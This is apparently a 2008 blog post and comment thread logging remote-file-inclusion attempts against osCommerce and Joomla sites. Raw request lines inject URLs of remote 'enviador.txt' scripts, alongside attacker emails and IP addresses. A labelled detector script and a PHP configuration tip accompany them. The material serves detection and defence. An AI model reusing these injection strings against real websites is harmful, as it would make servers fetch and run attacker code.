Jun 1, 2008

hacker using email brancohat@gmail.com and script at www.1004smile.com/data/enviador.txt

Another hacker trying to inject a PHP script located at:
http://www.1004smile.com/data/enviador.txt

[05-31-2008-15:49:12]
advanced_search_result.php?categories_id=http://www.1004smile.com/data/enviador.txt?&servidor=www._____.com/advanced_search_result.php?categories_id=&para=brancohat@gmail.com GET HTTP/1.1
Agent: -NO AGENT-
81.171.34.37 kopkaas.com

This has something to do with the osCommerce search routine.
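
The log entry above shows the pattern to look for: a query parameter whose value is itself a remote script URL. The Python detector below is an added example, not part of the original post; its function names, the `url_params_ok` allowlist and the `example.*` sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# A parameter value that is itself an absolute URL (checked after percent-decoding).
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)

def parse_params(request_uri):
    """Return [(name, value)] from a request URI or a log line that starts with one."""
    uri = request_uri.strip().partition(" ")[0]   # drop a trailing "GET HTTP/1.1"
    # Split on the first '?' only: the injected value carries its own '?' and '&'.
    query = uri.partition("?")[2]
    pairs = (p.partition("=") for p in query.split("&") if p)
    return [(unquote(name), unquote(value)) for name, _, value in pairs]

def find_remote_include(request_uri, url_params_ok=frozenset()):
    """Describe the first URL-valued parameter, or return None if there is none.

    url_params_ok: parameter names allowed to hold URLs (e.g. a redirect target).
    """
    params = parse_params(request_uri)
    for name, value in params:
        if name not in url_params_ok and REMOTE_URL.match(value):
            fields = dict(params)
            return {
                "param": name,
                "remote_url": value.strip().rstrip("?"),
                "remote_host": urlsplit(value.strip()).hostname,
                "servidor": fields.get("servidor"),   # extra fields seen on this page
                "para": fields.get("para"),
            }
    return None

# Constructed sample lines in the shape of the entries on this page;
# every host and address is an example.* placeholder.
SAMPLE_LINES = [
    "advanced_search_result.php?categories_id=http://files.example.net/data/enviador.txt"
    "?&servidor=www.shop.example/advanced_search_result.php?categories_id="
    "&para=someone@example.com GET HTTP/1.1",
    "/index.php?p=HTTP%3A%2F%2Fhost.example.org%3A8080%2Fenviador.txt%3F",
    "/advanced_search_result.php?categories_id=12&keywords=lamp",
    "/login.php?return_url=https://www.shop.example/account.php",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        hit = find_remote_include(line, url_params_ok={"return_url"})
        print(hit or "clean", "<-", line[:60])
```

Requests like these only succeed where the application feeds the parameter into a PHP include; with `allow_url_include` set to Off in php.ini, PHP refuses to include http:// or ftp:// URLs.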

10 comments:

Anonymous said...

also
http://www.neobundao.com/enviador.txt?&servidor=
and
http://www.darkhand.net/Bots/enviador.txt?&

Anonymous said...

Another one http://www.opengear.at/rotator/enviador.txt

Anonymous said...

hacker also using email kbtcone@yahoo.com and enviador.txt file to attack oscommerce sites

Abhishek Sachan said...

Who the hell are they... trying the same on 4 of my websites...
URL: [/index.php?p=http://premmy.myftp.biz:8080/enviador.txt?&servidor=www.talentcapital.ae/index.php?p=&para=premmy35@gmail.com] [/index.php?p=http://www.fpe.sn/webcam/enviador.txt?&servidor=www.talentcapital.ae/index.php?p=&para=premmy35@gmail.com]
From IP: {173.201.253.28, 194.24.252.101, 200.58.112.125, 200.80.36.148, 202.67.226.122, 208.109.186.113, 208.109.98.121, 218.189.139.238, 41.208.148.72, 62.156.178.189, 69.175.85.82, 72.167.48.2}
I think we must block these IPs.

Anonymous said...

Not just OSCommerce websites are affected. Joomla sites are also vulnerable to this attack, usually with the e-mail address premmy35@gmail.com

I detect this kind of attack on my websites on an almost daily basis. What can be done for this to be stopped permanently?

[BVS]

Anonymous said...

@Abhishek Sachan - blocking the IP addresses was also something that came into my mind but I'm afraid it won't do any good as the attacker(s) use another IP every time. I have detected attempts originating from Taiwanese, Russian, Polish, Iranian and German addresses.

[BVS]

Abhishek Sachan said...

Yeah, you are right... blocking IP is something difficult for them, but I have something new in my mind, not implemented yet... we can detect their user_agents; they are generally of type bots... there are databases present online which can tell you about the user agents. We can block them by scripts, but this method can also fail because it's easy to change the user agent...

tmaster said...

If you install M&M Autoban you can ban the action they are taking; it will then take care of banning the IPs it detects doing this.

Add the URLs and email addresses to the hackers file. In most cases they are already in it. Look for a new version soon, as the next upgrade will let you ban countries you do not want on your site.

citizenblogger said...

I also detect a similar attack in my web server logs, but using "sexycabrito@gmail.com" instead of "premy35@gmail.com". Can someone please give me more explanation about the mechanism of this attack?

best regards

citizenblogger said...

Hello,
I have the same logs appearing in my web server, but using "sexycabrito@gmail.com" instead of "premy35@gmail.com". Can anybody give me more explanation about these attacks?
Thanks,
best regards